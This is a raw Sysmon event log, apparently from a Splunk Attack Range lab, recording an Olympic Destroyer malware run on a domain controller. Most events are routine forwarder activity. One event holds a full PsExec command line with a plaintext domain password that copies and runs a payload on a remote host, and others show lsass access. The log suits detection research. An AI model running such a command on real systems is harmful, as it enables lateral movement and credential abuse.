11:10:38.978{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.757{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8588EDF4AEA49568058F8F13262BF00E,SHA256=36C09939DD09727F1441479456797D61B0E32507898E01A8AD2C9CE9CBDAB424,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:36.490{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51574-false10.0.1.12-8000- 23542300x8000000000000000220287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:38.353{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7F00F47EAD6AF2C59F5A123F648F135,SHA256=25C1C01326E6FC3A499382440E8EDB8F325CC5B67EE91DB3F7930B5D8AD9A76E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:39.368{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C6DCC0C454ABF3EF9E6518BE79FB42D,SHA256=566051109B10135A6047D17433C441CC3FAB445739CA6587761B5A7AB1F3FDBD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:37.528{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000296297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.441{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.441{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:10:39.425{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000296294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.341{C8EA50B7-F11F-6215-1000-000000003802}3646220C:\Windows\system32\svchost.exe{C8EA50B7-162F-6216-F206-000000003802}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.341{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-162F-6216-F206-000000003802}6804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.325{C8EA50B7-162F-6216-F206-000000003802}68046324C:\Windows\system32\conhost.exe{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.310{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-162F-6216-F206-000000003802}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.294{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-162F-6216-F206-000000003802}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.263{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.263{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:10:39.258{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000296286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.179{C8EA50B7-F11F-6215-1000-000000003802}3646220C:\Windows\system32\svchost.exe{C8EA50B7-162F-6216-F006-000000003802}7124C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.179{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-162F-6216-F006-000000003802}7124C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.179{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.179{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.179{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.179{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.163{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.163{C8EA50B7-162F-6216-F006-000000003802}71247136C:\Windows\system32\conhost.exe{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.163{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.165{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.163{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000296275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.160{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000296274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.126{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-162F-6216-F006-000000003802}7124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.110{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-162F-6216-F006-000000003802}7124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.079{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0C8BB034BEC7123A1E274727DF2C9609,SHA256=C5A429E0177CE52B5A1A727C4D059CDE84516FEF71C940C7DAAFF78C4E7899E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.079{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BA452A121E1F32418E5AB053E5E19FED,SHA256=098754AAC757404E2A0F55986B1F7D873CAE4BA7F2F0B99D6B4D0D7D2EAF3CAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:40.603{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F65E0A7EBBB47BC3B647F7F512B5BA1,SHA256=F9CDE68A63347B45838916135F09A0CB5C635E3B431C2CA40CEFF08FFF7FDC45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:38.755{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56002- 23542300x8000000000000000296300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:40.309{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:40.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53DA178395C98011BDB665FFA97D77AD,SHA256=9D841D5C9D896D3087675380F31BE1F3FFEB3E06C4E7D5CD0B753001992FBED8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:41.837{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57AD9277DEC2E4150BE142E7CBC929BC,SHA256=C0B71B890638F96115CF2D76FAAB2E507F9A91F621DED011937300ADF787CC31,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:39.767{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49328-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000296302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:41.278{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 